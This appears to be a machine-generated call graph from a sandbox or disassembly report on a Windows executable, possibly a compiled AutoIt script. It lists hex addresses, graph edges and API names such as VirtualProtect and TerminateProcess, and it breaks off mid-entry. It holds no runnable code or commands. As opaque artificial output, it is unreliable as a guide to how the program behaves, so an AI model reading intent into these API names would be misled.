42b5d7 VariantClear 86758->86761 86758->86767 86759 4115d7 52 API calls 86759->86767 86761->86767 86763 42bc37 88380 45e737 90 API calls 3 library calls 86763->88380 86766 42bc48 86766->86751 86768 408f40 VariantClear 86766->86768 86767->86733 86767->86734 86767->86735 86767->86737 86767->86738 86767->86739 86767->86740 86767->86741 86767->86743 86767->86745 86767->86747 86767->86748 86767->86750 86767->86751 86767->86753 86767->86755 86767->86757 86767->86759 86767->86763 88374 45308a 53 API calls 86767->88374 88375 470870 52 API calls 86767->88375 88376 457f66 87 API calls __write_nolock 86767->88376 88377 472f47 127 API calls 86767->88377 86768->86751 86769->86626 86770->86543 86772 40c2c7 86771->86772 86773 40c30e 86771->86773 86776 40c2d3 86772->86776 86783 426c79 86772->86783 86774 40c315 86773->86774 86775 426c2b 86773->86775 86777 40c321 86774->86777 86782 426c5a 86774->86782 86779 426c4b 86775->86779 86784 426c2e 86775->86784 88382 403ea0 52 API calls __cinit 86776->88382 88383 403ea0 52 API calls __cinit 86777->88383 88385 4534e3 52 API calls 86779->88385 88386 4534e3 52 API calls 86782->88386 88387 4534e3 52 API calls 86783->88387 86788 40c2de 86784->86788 88384 4534e3 52 API calls 86784->88384 86788->86589 86788->86788 86789->86589 86790->86655 86792 40ba49 86791->86792 86793 40ba1b ctype _memmove 86791->86793 86795 4115d7 52 API calls 86792->86795 86794 4115d7 52 API calls 86793->86794 86796 40ba22 86794->86796 86795->86793 86796->86589 86797->86589 86798->86563 86799->86588 86800->86554 86801->86558 86802->86564 86803->86625 86804->86625 86805->86625 86806->86625 86807->86577 86808->86596 86809->86584 86810->86612 86811->86633 86812->86633 86813->86633 86814->86626 86815->86637 86816->86652 86817->86645 86818->86650 86819->86658 86820->86658 86821->86596 86822->86548 86824 42c5fe 86823->86824 86839 4091c6 86823->86839 86825 40bc70 52 API calls 86824->86825 86824->86839 86826 42c64e InterlockedIncrement 86825->86826 86827 42c665 86826->86827 86832 42c697 86826->86832 86830 42c672 InterlockedDecrement Sleep InterlockedIncrement 86827->86830 86827->86832 86828 42c737 InterlockedDecrement 86829 42c74a 86828->86829 86833 408f40 VariantClear 86829->86833 86830->86827 86830->86832 86831 42c731 86831->86828 86832->86828 86832->86831 86989 408e80 VariantClear 86832->86989 86835 42c752 86833->86835 86999 410c60 VariantClear ctype 86835->86999 86836 42c6cf 86990 45340c 86836->86990 86839->86720 86840 42c6db 86841 402160 52 API calls 86840->86841 86842 42c6e5 86841->86842 86843 45340c 85 API calls 86842->86843 86844 42c6f1 86843->86844 86996 40d200 52 API calls 2 library calls 86844->86996 86846 42c6fb 86997 465124 53 API calls 86846->86997 86848 42c715 86849 42c76a 86848->86849 86850 42c719 86848->86850 87000 401b10 86849->87000 86998 46fe32 VariantClear 86850->86998 86853 42c77e 86854 401980 53 API calls 86853->86854 86861 42c796 86854->86861 86855 42c812 87006 46fe32 VariantClear 86855->87006 86857 42c82a InterlockedDecrement 87007 46ff07 54 API calls 86857->87007 86859 42c849 86862 42c9ec 86859->86862 86868 401980 53 API calls 86859->86868 86869 408f40 VariantClear 86859->86869 86873 402780 52 API calls 86859->86873 86878 40a780 261 API calls 86859->86878 86860 42c864 87008 45e737 90 API calls 3 library calls 86860->87008 86861->86855 86861->86860 86864 40ba10 52 API calls 86861->86864 87010 47d33e 400 API calls 86862->87010 86864->86861 86866 42c9fe 87011 46feb1 VariantClear VariantClear 86866->87011 86868->86859 86869->86859 86870 42ca08 86871 401b10 52 API calls 86870->86871 86874 42ca15 86871->86874 86872 408f40 VariantClear 86875 42c891 86872->86875 86873->86859 86876 40c2c0 52 API calls 86874->86876 87009 410c60 VariantClear ctype 86875->87009 86879 42c874 86876->86879 86878->86859 86879->86872 86880 42ca59 86879->86880 86880->86880 86882 40afc4 86881->86882 86883 40b156 86881->86883 86884 40afd5 86882->86884 86885 42d1e3 86882->86885 87013 45e737 90 API calls 3 library calls 86883->87013 86888 40a780 261 API calls 86884->86888 86904 40b11a ctype 86884->86904 87014 45e737 90 API calls 3 library calls 86885->87014 86891 40b00a 86888->86891 86889 42d1f8 86894 408f40 VariantClear 86889->86894 86890 40b143 86890->86720 86891->86889 86895 40b012 86891->86895 86893 42d4db 86893->86893 86894->86890 86897 42d231 VariantClear 86895->86897 86900 40b04a 86895->86900 86905 40b094 ctype 86895->86905 86896 42d425 ctype 86899 42d45a VariantClear 86896->86899 86896->86904 86906 40b05c ctype 86897->86906 86898 40b108 86898->86904 87016 40e270 VariantClear ctype 86898->87016 86899->86904 86900->86906 87015 40e270 VariantClear ctype 86900->87015 86902 4115d7 52 API calls 86902->86905 86904->86890 87017 45e737 90 API calls 3 library calls 86904->87017 86905->86896 86905->86898 86906->86902 86906->86905 86908 40900d 86907->86908 86909 408fff 86907->86909 86912 42c3f6 86908->86912 86914 42c44a 86908->86914 86915 40a780 261 API calls 86908->86915 86916 42c47b 86908->86916 86919 42c564 86908->86919 86921 42c4cb 86908->86921 86926 42c548 86908->86926 86927 409112 86908->86927 86929 4090df 86908->86929 86931 42c528 86908->86931 86933 4090ea 86908->86933 86941 4090f2 ctype 86908->86941 87021 4534e3 52 API calls 86908->87021 87023 40c4e0 261 API calls 86908->87023 87018 403ea0 52 API calls __cinit 86909->87018 87022 45e737 90 API calls 3 library calls 86912->87022 87024 45e737 90 API calls 3 library calls 86914->87024 86915->86908 87025 451b42 61 API calls 86916->87025 86923 408f40 VariantClear 86919->86923 87027 47faae 300 API calls 86921->87027 86923->86941 86924 42c491 86924->86941 87026 45e737 90 API calls 3 library calls 86924->87026 86925 42c4da 86925->86941 87028 45e737 90 API calls 3 library calls 86925->87028 87030 45e737 90 API calls 3 library calls 86926->87030 86927->86926 86936 40912b 86927->86936 86929->86933 87019 408e80 VariantClear 86929->87019 87029 45e737 90 API calls 3 library calls 86931->87029 86937 408f40 VariantClear 86933->86937 86936->86941 87020 403e10 53 API calls 86936->87020 86937->86941 86939 40914b 86940 408f40 VariantClear 86939->86940 86940->86941 86941->86720 87031 408d90 86942->87031 86944 408cf9 86945 429778 86944->86945 86948 42976c 86944->86948 86950 408d2d 86944->86950 87060 410c60 VariantClear ctype 86945->87060 86947 429780 87059 45e737 90 API calls 3 library calls 86948->87059 87047 403d10 86950->87047 86953 408d71 ctype 86953->86720 86954 408f40 VariantClear 86955 408d45 ctype 86954->86955 86955->86953 86955->86954 86958 425c87 86956->86958 86960 40d15f 86956->86960 86957 425cc7 86958->86957 86959 425ca1 TranslateAcceleratorW 86958->86959 86959->86960 86960->86720 86962 42602f 86961->86962 86966 40d17f 86961->86966 86962->86720 86963 42608e IsDialogMessageW 86964 40d18c 86963->86964 86963->86966 86964->86720 86966->86963 86966->86964 88372 430c46 GetClassLongW 86966->88372 86967->86720 86968->86670 86969->86675 86970->86720 86971->86720 86972->86720 86973->86720 86974->86727 86975->86727 86976->86727 86977->86727 86978->86727 86979->86727 86980->86727 86982 403cdf 86981->86982 86983 408f40 VariantClear 86982->86983 86984 403ce7 86983->86984 86984->86713 86985->86727 86986->86727 86987->86720 86988->86667 86989->86836 86991 453439 86990->86991 86992 453419 86990->86992 86991->86840 86993 45342f 86992->86993 87012 4531b1 85 API calls 5 library calls 86992->87012 86993->86840 86995 453425 86995->86840 86996->86846 86997->86848 86998->86831 86999->86839 87001 401b16 _wcslen 87000->87001 87002 4115d7 52 API calls 87001->87002 87003 401b63 87001->87003 87004 401b4b _memmove 87002->87004 87003->86853 87005 4115d7 52 API calls 87004->87005 87005->87003 87006->86857 87007->86859 87008->86879 87009->86839 87010->86866 87011->86870 87012->86995 87013->86885 87014->86889 87015->86906 87016->86904 87017->86893 87018->86908 87019->86933 87020->86939 87021->86908 87022->86941 87023->86908 87024->86941 87025->86924 87026->86941 87027->86925 87028->86941 87029->86941 87030->86919 87032 4289d2 87031->87032 87033 408db3 87031->87033 87065 45e737 90 API calls 3 library calls 87032->87065 87061 40bec0 87033->87061 87036 4289e5 87066 45e737 90 API calls 3 library calls 87036->87066 87038 40ba10 52 API calls 87043 408dc9 87038->87043 87039 428a05 87040 408f40 VariantClear 87039->87040 87046 408e5a 87040->87046 87041 40a780 261 API calls 87041->87043 87042 408e64 87044 408f40 VariantClear 87042->87044 87043->87036 87043->87038 87043->87039 87043->87041 87043->87042 87045 408f40 VariantClear 87043->87045 87043->87046 87044->87046 87045->87043 87046->86944 87048 408f40 VariantClear 87047->87048 87049 403d20 87048->87049 87050 403cd0 VariantClear 87049->87050 87051 403d4d 87050->87051 87068 475596 87051->87068 87071 46e1a6 87051->87071 87119 46f993 87051->87119 87158 4813fa 87051->87158 87168 4755ad 87051->87168 87171 467897 87051->87171 87052 403d76 87052->86945 87052->86955 87059->86945 87060->86947 87062 40bed0 87061->87062 87063 40bef2 87062->87063 87067 45e737 90 API calls 3 library calls 87062->87067 87063->87043 87065->87036 87066->87039 87067->87063 87215 475077 87068->87215 87070 4755a9 87070->87052 87072 46e1c0 87071->87072 87073 4533eb 85 API calls 87072->87073 87075 46e1dc 87073->87075 87074 46e483 87074->87052 87075->87074 87076 46e2e7 87075->87076 87077 46e1e9 87075->87077 87394 40f760 87076->87394 87078 45340c 85 API calls 87077->87078 87086 46e1f4 _wcscpy _wcschr 87078->87086 87081 46e2fc 87084 403cd0 VariantClear 87081->87084 87082 46e30d 87083 45340c 85 API calls 87082->87083 87085 46e332 87083->87085 87087 46e2c8 87084->87087 87088 413a0e __wsplitpath 46 API calls 87085->87088 87093 46e216 _wcscat _wcscpy 87086->87093 87096 46e248 _wcscat 87086->87096 87089 408f40 VariantClear 87087->87089 87098 46e338 _wcscat _wcscpy 87088->87098 87090 46e2d0 87089->87090 87090->87052 87091 45340c 85 API calls 87092 46e264 _wcscpy 87091->87092 87476 433998 GetFileAttributesW 87092->87476 87094 45340c 85 API calls 87093->87094 87094->87096 87096->87091 87097 46e27d _wcslen 87097->87087 87099 45340c 85 API calls 87097->87099 87101 45340c 85 API calls 87098->87101 87100 46e2b0 87099->87100 87477 44bd27 80 API calls 4 library calls 87100->87477 87103 46e3e3 87101->87103 87413 433784 87103->87413 87104 46e2bd 87104->87074 87104->87087 87106 46e3e9 87420 4339fa 87106->87420 87109 46e401 87110 408f40 VariantClear 87109->87110 87112 46e43e 87110->87112 87111 45340c 85 API calls 87113 46e419 87111->87113 87478 431e58 87112->87478 87423 452ac7 87113->87423 87120 40e710 53 API calls 87119->87120 87121 46f9ba 87120->87121 87122 4115d7 52 API calls 87121->87122 87130 46fa26 87121->87130 87123 46f9d3 87122->87123 87124 46f9df 87123->87124 88160 40da60 53 API calls 87123->88160 87127 4533eb 85 API calls 87124->87127 87125 46fa38 87125->87052 87129 46f9f0 87127->87129 88161 40de40 87129->88161 87130->87125 87135 46fa7a 87130->87135 88146 44c285 87130->88146 87132 46fb17 87137 40bc70 52 API calls 87132->87137 87133 46fa99 87136 4115d7 52 API calls 87133->87136 87135->87132 87135->87133 87139 46fa9f 87136->87139 87140 46fb20 87137->87140 87138 46fa01 87141 46fa0b 87138->87141 88173 44ae3e CloseHandle ctype 87138->88173 87143 46fab6 87139->87143 88174 443ee5 ReadFile SetFilePointerEx 87139->88174 88149 46ea94 87140->88149 87141->87052 87153 46faba ctype 87143->87153 88175 453132 53 API calls __recalloc 87143->88175 87147 46fb30 87147->87153 88176 40e6a0 53 API calls 87147->88176 87148 46faea _memmove 87152 403cd0 VariantClear 87148->87152 87150 46fb52 87151 403cd0 VariantClear 87150->87151 87151->87153 87152->87153 87154 46fb99 87153->87154 88177 40da20 87153->88177 87154->87052 87156 46fb8b 88181 44ae3e CloseHandle ctype 87156->88181 87159 45340c 85 API calls 87158->87159 87160 481438 87159->87160 88312 402880 87160->88312 87162 48143f 87163 481465 87162->87163 87164 40a780 261 API calls 87162->87164 87165 40e710 53 API calls 87163->87165 87166 481469 87163->87166 87164->87163 87167 4814a4 87165->87167 87166->87052 87167->87052 87169 475077 128 API calls 87168->87169 87170 4755c0 87169->87170 87170->87052 87172 4678bb 87171->87172 87174 45340c 85 API calls 87172->87174 87200 467954 87172->87200 87173 4115d7 52 API calls 87175 467989 87173->87175 87176 4678f6 87174->87176 87177 467995 87175->87177 88369 40da60 53 API calls 87175->88369 87178 413a0e __wsplitpath 46 API calls 87176->87178 87180 4533eb 85 API calls 87177->87180 87181 4678fc 87178->87181 87182 4679b7 87180->87182 87183 401b10 52 API calls 87181->87183 87184 40de40 60 API calls 87182->87184 87185 46790c 87183->87185 87186 4679c3 87184->87186 88367 40d200 52 API calls 2 library calls 87185->88367 87188 4679c7 GetLastError 87186->87188 87189 467a05 87186->87189 87191 403cd0 VariantClear 87188->87191 87192 467a2c 87189->87192 87193 467a4b 87189->87193 87190 467917 87195 4339fa 3 API calls 87190->87195 87190->87200 87194 4679dc 87191->87194 87196 4115d7 52 API calls 87192->87196 87197 4115d7 52 API calls 87193->87197 87198 4679e6 87194->87198 88370 44ae3e CloseHandle ctype 87194->88370 87199 467928 87195->87199 87202 467a31 87196->87202 87203 467a49 87197->87203 87206 408f40 VariantClear 87198->87206 87199->87200 87205 46792f 87199->87205 87200->87173 87201 467964 87200->87201 87201->87052 88371 436299 52 API calls 2 library calls 87202->88371 87210 408f40 VariantClear 87203->87210 88368 4335cd 56 API calls 3 library calls 87205->88368 87209 4679ed 87206->87209 87209->87052 87212 467a88 87210->87212 87211 467939 87211->87200 87213 408f40 VariantClear 87211->87213 87212->87052 87214 467947 87213->87214 87214->87200 87268 4533eb 87215->87268 87218 4750ee 87220 408f40 VariantClear 87218->87220 87219 475129 87272 4646e0 87219->87272 87228 4750f5 87220->87228 87222 47515e 87223 475162 87222->87223 87248 47518e 87222->87248 87224 408f40 VariantClear 87223->87224 87246 475169 87224->87246 87225 475357 87226 475365 87225->87226 87227 4754ea 87225->87227 87352 44b3ac 57 API calls 87226->87352 87355 464812 92 API calls 87227->87355 87228->87070 87232 4754fc 87233 475374 87232->87233 87234 475508 87232->87234 87285 430d31 87233->87285 87236 408f40 VariantClear 87234->87236 87235 4533eb 85 API calls 87235->87248 87238 47550f 87236->87238 87238->87246 87239 475388 87292 4577e9 87239->87292 87242 47539e 87300 410cfc 87242->87300 87243 475480 87244 408f40 VariantClear 87243->87244 87244->87246 87246->87070 87248->87225 87248->87235 87248->87243 87254 4754b5 87248->87254 87350 436299 52 API calls 2 library calls 87248->87350 87351 463ad5 64 API calls __wcsicoll 87248->87351 87249 4753d4 87251 40e830 53 API calls 87249->87251 87250 4753b8 87353 45e737 90 API calls 3 library calls 87250->87353 87255 4753e3 87251->87255 87253 4753c5 GetCurrentProcess TerminateProcess 87253->87249 87256 408f40 VariantClear 87254->87256 87257 40cf00 53 API calls 87255->87257 87266 475406 87255->87266 87256->87246 87258 4753f8 87257->87258 87259 46c43e 106 API calls 87258->87259 87259->87266 87261 475556 87261->87246 87262 47556e FreeLibrary 87261->87262 87262->87246 87266->87261 87267 408f40 VariantClear 87266->87267 87304 40cf00 87266->87304 87317 46c43e 87266->87317 87354 408e80 VariantClear 87266->87354 87356 44b3ac 57 API calls 87266->87356 87267->87266 87269 453404 87268->87269 87270 4533f8 87268->87270 87269->87218 87269->87219 87270->87269 87357 4531b1 85 API calls 5 library calls 87270->87357 87358 4536f7 53 API calls 87272->87358 87274 4646fc 87359 4426cd 59 API calls _wcslen 87274->87359 87276 464711 87278 40bc70 52 API calls 87276->87278 87284 46474b 87276->87284 87279 46472c 87278->87279 87360 461465 52 API calls _memmove 87279->87360 87281 464741 87283 40c600 52 API calls 87281->87283 87282 464793 87282->87222 87283->87284 87284->87282 87361 463ad5 64 API calls __wcsicoll 87284->87361 87286 430db2 87285->87286 87287 430d54 87285->87287 87286->87239 87288 4115d7 52 API calls 87287->87288 87291 430d74 87288->87291 87289 430da9 87289->87239 87290 4115d7 52 API calls 87290->87291 87291->87289 87291->87290 87293 457a84 87292->87293 87299 45780c _strcat _wcslen _wcscpy ctype 87292->87299 87293->87242 87294 45340c 85 API calls 87294->87299 87295 443006 57 API calls 87295->87299 87297 4135bb 46 API calls _malloc 87297->87299 87299->87293 87299->87294 87299->87295 87299->87297 87362 40f6f0 87299->87362 87370 44b3ac 57 API calls 87299->87370 87302 410d11 87300->87302 87301 410da9 VirtualProtect 87303 410d77 87301->87303 87302->87301 87302->87303 87303->87249 87303->87250 87305 428ac6 87304->87305 87306 40cf0e 87304->87306 87305->87266 87307 40cf19 87306->87307 87371 40e810 52 API calls 87306->87371 87310 40cf1d 87307->87310 87373 40e950 53 API calls 87307->87373 87311 40cf38 87310->87311 87312 4115d7 52 API calls 87310->87312 87311->87266 87313 40cf88 87312->87313 87314 40cfaa 87313->87314 87372 40d290 52 API calls 87313->87372 87314->87266 87316 40cf96 87316->87266 87318 46c459 87317->87318 87349 46c477 ctype 87317->87349 87320 46c507 87318->87320 87321 46c567 87318->87321 87322 46c4c5 87318->87322 87323 46c585 87318->87323 87324 46c460 87318->87324 87325 46c4ab 87318->87325 87326 46c488 87318->87326 87327 46c549 87318->87327 87328 46c496 87318->87328 87329 46c537 87318->87329 87330 46c4f1 87318->87330 87331 46c51f 87318->87331 87332 46c4db 87318->87332 87319 46c5ab 87319->87266 87342 408f40 VariantClear 87320->87342 87333 408f40 VariantClear 87321->87333 87339 408f40 VariantClear 87322->87339 87392 468070 104 API calls ctype 87323->87392 87380 43299a 54 API calls _strlen 87324->87380 87338 408f40 VariantClear 87325->87338 87334 40e710 53 API calls 87326->87334 87346 408f40 VariantClear 87327->87346 87336 408f40 VariantClear 87328->87336 87344 408f40 VariantClear 87329->87344 87341 408f40 VariantClear 87330->87341 87343 408f40 VariantClear 87331->87343 87340 408f40 VariantClear 87332->87340 87333->87349 87334->87349 87336->87349 87338->87349 87339->87349 87340->87349 87341->87349 87342->87349 87343->87349 87344->87349 87346->87349 87347 46c46a 87381 40e710 87347->87381 87349->87319 87374 413748 87349->87374 87350->87248 87351->87248 87352->87233 87353->87253 87354->87266 87355->87232 87356->87266 87357->87269 87358->87274 87359->87276 87360->87281 87361->87282 87363 425de2 87362->87363 87365 40f6fc _wcslen 87362->87365 87363->87299 87364 40f710 WideCharToMultiByte 87366 40f756 87364->87366 87367 40f728 87364->87367 87365->87364 87366->87299 87368 4115d7 52 API calls 87367->87368 87369 40f735 WideCharToMultiByte 87368->87369 87369->87299 87370->87299 87371->87307 87372->87316 87373->87310 87375 413753 RtlFreeHeap 87374->87375 87379 41377c __dosmaperr 87374->87379 87376 413768 87375->87376 87375->87379 87393 417f77 46 API calls __getptd_noexit 87376->87393 87378 41376e GetLastError 87378->87379 87379->87319 87380->87347 87382 408f40 VariantClear 87381->87382 87383 40e71b 87382->87383 87384 4115d7 52 API calls 87383->87384 87385 40e729 87384->87385 87386 40e734 87385->87386 87387 426bdc 87385->87387 87388 426be7 87386->87388 87389 401b10 52 API calls 87386->87389 87387->87388 87390 40bc70 52 API calls 87387->87390 87391 40e743 87389->87391 87390->87388 87391->87349 87392->87349 87393->87378 87395 40f6f0 54 API calls 87394->87395 87396 40f77b _strcat ctype 87395->87396 87482 40f850 87396->87482 87401 427c2a 87511 414d04 87401->87511 87403 40f7fc 87403->87401 87405 40f804 87403->87405 87498 414a46 87405->87498 87409 40f80e 87409->87081 87409->87082 87410 427c59 87517 414fe2 87410->87517 87412 427c79 87414 433791 _wcschr __write_nolock 87413->87414 87415 4337a8 _wcscpy 87414->87415 87416 413a0e __wsplitpath 46 API calls 87414->87416 87415->87106 87417 4337dd 87416->87417 87418 413a0e __wsplitpath 46 API calls 87417->87418 87419 4337ff _wcscat _wcscpy 87418->87419 87419->87106 87922 4339b6 GetFileAttributesW 87420->87922 87422 433a06 87422->87109 87422->87111 87424 452ad7 __write_nolock 87423->87424 87425 442c5a GetSystemTimeAsFileTime 87424->87425 87426 452b2b 87425->87426 87427 4150d1 _fseek 81 API calls 87426->87427 87428 452b40 87427->87428 87429 452c30 87428->87429 87430 452b59 87428->87430 87927 452719 87429->87927 87431 452719 90 API calls 87430->87431 87476->87097 87477->87104 87479 431e64 87478->87479 87480 431e6a 87478->87480 87481 414a46 __fcloseall 82 API calls 87479->87481 87480->87052 87481->87480 87484 40f85d __recalloc _strlen 87482->87484 87485 40f7ab 87484->87485 87530 414db8 87484->87530 87486 4149c2 87485->87486 87545 414904 87486->87545 87488 40f7e9 87488->87401 87489 40f5c0 87488->87489 87494 40f5cd _strcat __write_nolock _memmove 87489->87494 87490 414d04 __fread_nolock 61 API calls 87490->87494 87492 425d11 87493 4150d1 _fseek 81 API calls 87492->87493 87495 425d33 87493->87495 87494->87490 87494->87492 87497 40f691 __tzset_nolock 87494->87497 87661 4150d1 87494->87661 87496 414d04 __fread_nolock 61 API calls 87495->87496 87496->87497 87497->87403 87499 414a52 ___lock_fhandle 87498->87499 87500 414a64 87499->87500 87501 414a79 87499->87501 87767 417f77 46 API calls __getptd_noexit 87500->87767 87504 415471 __lock_file 47 API calls 87501->87504 87506 414a74 ___lock_fhandle 87501->87506 87503 414a69 87768 417f25 10 API calls __wcsicoll 87503->87768 87507 414a92 87504->87507 87506->87409 87751 4149d9 87507->87751 87831 414c76 87511->87831 87513 414d1c 87514 44afef 87513->87514 87915 442c5a 87514->87915 87516 44b00d 87516->87410 87518 414fee ___lock_fhandle 87517->87518 87519 414ffa 87518->87519 87520 41500f 87518->87520 87919 417f77 46 API calls __getptd_noexit 87519->87919 87522 415471 __lock_file 47 API calls 87520->87522 87524 415017 87522->87524 87523 414fff 87920 417f25 10 API calls __wcsicoll 87523->87920 87526 414e4e __ftell_nolock 51 API calls 87524->87526 87527 415024 87526->87527 87921 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87527->87921 87529 41500a ___lock_fhandle 87529->87412 87531 414dd6 87530->87531 87532 414deb 87530->87532 87541 417f77 46 API calls __getptd_noexit 87531->87541 87532->87531 87534 414df2 87532->87534 87543 41b91b 79 API calls 11 library calls 87534->87543 87535 414ddb 87542 417f25 10 API calls __wcsicoll 87535->87542 87538 414e18 87539 414de6 87538->87539 87544 418f98 77 API calls 5 library calls 87538->87544 87539->87484 87541->87535 87542->87539 87543->87538 87544->87539 87547 414910 ___lock_fhandle 87545->87547 87546 414923 87601 417f77 46 API calls __getptd_noexit 87546->87601 87547->87546 87550 414951 87547->87550 87549 414928 87602 417f25 10 API calls __wcsicoll 87549->87602 87564 41d4d1 87550->87564 87553 414956 87554 41496a 87553->87554 87555 41495d 87553->87555 87557 414992 87554->87557 87558 414972 87554->87558 87603 417f77 46 API calls __getptd_noexit 87555->87603 87581 41d218 87557->87581 87604 417f77 46 API calls __getptd_noexit 87558->87604 87560 414933 ___lock_fhandle @_EH4_CallFilterFunc@8 87560->87488 87565 41d4dd ___lock_fhandle 87564->87565 87606 4182cb 87565->87606 87567 41d560 87613 41d5fb 87567->87613 87568 41d567 87645 416b04 87568->87645 87571 41d5f0 ___lock_fhandle 87571->87553 87573 41d57c InitializeCriticalSectionAndSpinCount 87576 41d59c 87573->87576 87577 41d5af EnterCriticalSection 87573->87577 87578 413748 _free 46 API calls 87576->87578 87577->87567 87578->87567 87579 41d4eb 87579->87567 87579->87568 87616 418209 87579->87616 87643 4154b2 47 API calls __lock 87579->87643 87644 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87579->87644 87582 41d23a 87581->87582 87583 41d255 87582->87583 87595 41d26c __wopenfile 87582->87595 87654 417f77 46 API calls __getptd_noexit 87583->87654 87585 41d25a 87655 417f25 10 API calls __wcsicoll 87585->87655 87586 41d421 87588 41d47a 87586->87588 87589 41d48c 87586->87589 87659 417f77 46 API calls __getptd_noexit 87588->87659 87651 422bf9 87589->87651 87592 41499d 87605 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87592->87605 87593 41d47f 87660 417f25 10 API calls __wcsicoll 87593->87660 87595->87586 87595->87588 87595->87595 87656 41341f 58 API calls 2 library calls 87595->87656 87597 41d41a 87597->87586 87657 41341f 58 API calls 2 library calls 87597->87657 87599 41d439 87599->87586 87658 41341f 58 API calls 2 library calls 87599->87658 87601->87549 87602->87560 87603->87560 87604->87560 87605->87560 87607 4182e0 87606->87607 87608 4182f3 EnterCriticalSection 87606->87608 87609 418209 __mtinitlocknum 45 API calls 87607->87609 87608->87579 87610 4182e6 87609->87610 87610->87608 87611 411924 __amsg_exit 45 API calls 87610->87611 87612 4182f2 87611->87612 87612->87608 87614 4181f2 _doexit LeaveCriticalSection 87613->87614 87615 41d602 87614->87615 87615->87571 87617 418215 ___lock_fhandle 87616->87617 87618 418225 87617->87618 87619 41823d 87617->87619 87620 418901 __FF_MSGBANNER 45 API calls 87618->87620 87621 416b04 __malloc_crt 45 API calls 87619->87621 87627 41824b ___lock_fhandle 87619->87627 87622 41822a 87620->87622 87623 418256 87621->87623 87624 418752 __NMSG_WRITE 45 API calls 87622->87624 87625 41825d 87623->87625 87626 41826c 87623->87626 87628 418231 87624->87628 87630 417f77 __wcsicoll 45 API calls 87625->87630 87631 4182cb __lock 45 API calls 87626->87631 87627->87579 87629 411682 _fast_error_exit GetModuleHandleW GetProcAddress ExitProcess 87628->87629 87632 41823b 87629->87632 87630->87627 87633 418273 87631->87633 87632->87619 87634 4182a6 87633->87634 87635 41827b InitializeCriticalSectionAndSpinCount 87633->87635 87636 413748 _free 45 API calls 87634->87636 87637 418297 87635->87637 87638 41828b 87635->87638 87636->87637 87641 4182c2 __mtinitlocknum LeaveCriticalSection 87637->87641 87639 413748 _free 45 API calls 87638->87639 87640 418291 87639->87640 87642 417f77 __wcsicoll 45 API calls 87640->87642 87641->87627 87642->87637 87643->87579 87644->87579 87648 416b0d 87645->87648 87646 4135bb _malloc 45 API calls 87646->87648 87647 416b43 87647->87567 87647->87573 87648->87646 87648->87647 87649 416b24 Sleep 87648->87649 87650 416b39 87649->87650 87650->87647 87650->87648 87652 422b35 __wsopen_helper 109 API calls 87651->87652 87653 422c14 87652->87653 87653->87592 87654->87585 87655->87592 87656->87597 87657->87599 87658->87586 87659->87593 87660->87592 87664 4150dd ___lock_fhandle 87661->87664 87662 4150e9 87692 417f77 46 API calls __getptd_noexit 87662->87692 87664->87662 87665 41510f 87664->87665 87674 415471 87665->87674 87666 4150ee 87693 417f25 10 API calls __wcsicoll 87666->87693 87672 4150f9 ___lock_fhandle 87672->87494 87675 415483 87674->87675 87676 4154a5 EnterCriticalSection 87674->87676 87675->87676 87677 41548b 87675->87677 87678 415117 87676->87678 87679 4182cb __lock 46 API calls 87677->87679 87680 415047 87678->87680 87679->87678 87681 415067 87680->87681 87682 415057 87680->87682 87687 415079 87681->87687 87695 414e4e 87681->87695 87750 417f77 46 API calls __getptd_noexit 87682->87750 87686 41505c 87694 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87686->87694 87712 41443c 87687->87712 87690 4150b9 87725 41e1f4 87690->87725 87692->87666 87693->87672 87694->87672 87696 414e61 87695->87696 87697 414e79 87695->87697 87699 417f77 __wcsicoll 46 API calls 87696->87699 87698 414139 __flswbuf 46 API calls 87697->87698 87700 414e80 87698->87700 87701 414e66 87699->87701 87703 41e1f4 __write 51 API calls 87700->87703 87702 417f25 __wcsicoll 10 API calls 87701->87702 87711 414e71 87702->87711 87704 414e97 87703->87704 87705 414f09 87704->87705 87707 414ec9 87704->87707 87704->87711 87706 417f77 __wcsicoll 46 API calls 87705->87706 87706->87711 87708 41e1f4 __write 51 API calls 87707->87708 87707->87711 87709 414f64 87708->87709 87710 41e1f4 __write 51 API calls 87709->87710 87709->87711 87710->87711 87711->87687 87713 414455 87712->87713 87717 414477 87712->87717 87714 414139 __flswbuf 46 API calls 87713->87714 87713->87717 87715 414470 87714->87715 87716 41b7b2 __write 77 API calls 87715->87716 87716->87717 87718 414139 87717->87718 87719 414145 87718->87719 87720 41415a 87718->87720 87721 417f77 __wcsicoll 46 API calls 87719->87721 87720->87690 87722 41414a 87721->87722 87723 417f25 __wcsicoll 10 API calls 87722->87723 87724 414155 87723->87724 87724->87690 87726 41e200 ___lock_fhandle 87725->87726 87727 41e223 87726->87727 87728 41e208 87726->87728 87730 41e22f 87727->87730 87735 41e269 87727->87735 87729 417f8a __write_nolock 46 API calls 87728->87729 87731 41e20d 87729->87731 87732 417f8a __write_nolock 46 API calls 87730->87732 87733 417f77 __wcsicoll 46 API calls 87731->87733 87734 41e234 87732->87734 87745 41e215 ___lock_fhandle 87733->87745 87737 417f77 __wcsicoll 46 API calls 87734->87737 87736 41ae56 ___lock_fhandle 48 API calls 87735->87736 87738 41e26f 87736->87738 87739 41e23c 87737->87739 87740 41e291 87738->87740 87741 41e27d 87738->87741 87742 417f25 __wcsicoll 10 API calls 87739->87742 87744 417f77 __wcsicoll 46 API calls 87740->87744 87743 41e17f __lseek_nolock 48 API calls 87741->87743 87742->87745 87746 41e289 87743->87746 87747 41e296 87744->87747 87745->87686 87749 41e2c0 __write LeaveCriticalSection 87746->87749 87748 417f8a __write_nolock 46 API calls 87747->87748 87748->87746 87749->87745 87750->87686 87752 4149ea 87751->87752 87753 4149fe 87751->87753 87797 417f77 46 API calls __getptd_noexit 87752->87797 87756 4149fa 87753->87756 87757 41443c __flush 77 API calls 87753->87757 87755 4149ef 87798 417f25 10 API calls __wcsicoll 87755->87798 87769 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87756->87769 87758 414a0a 87757->87758 87770 41d8c2 87758->87770 87762 414139 __flswbuf 46 API calls 87763 414a18 87762->87763 87774 41d7fe 87763->87774 87765 414a1e 87765->87756 87766 413748 _free 46 API calls 87765->87766 87766->87756 87767->87503 87768->87506 87769->87506 87771 414a12 87770->87771 87772 41d8d2 87770->87772 87771->87762 87772->87771 87773 413748 _free 46 API calls 87772->87773 87773->87771 87775 41d80a ___lock_fhandle 87774->87775 87776 41d812 87775->87776 87777 41d82d 87775->87777 87824 417f8a 46 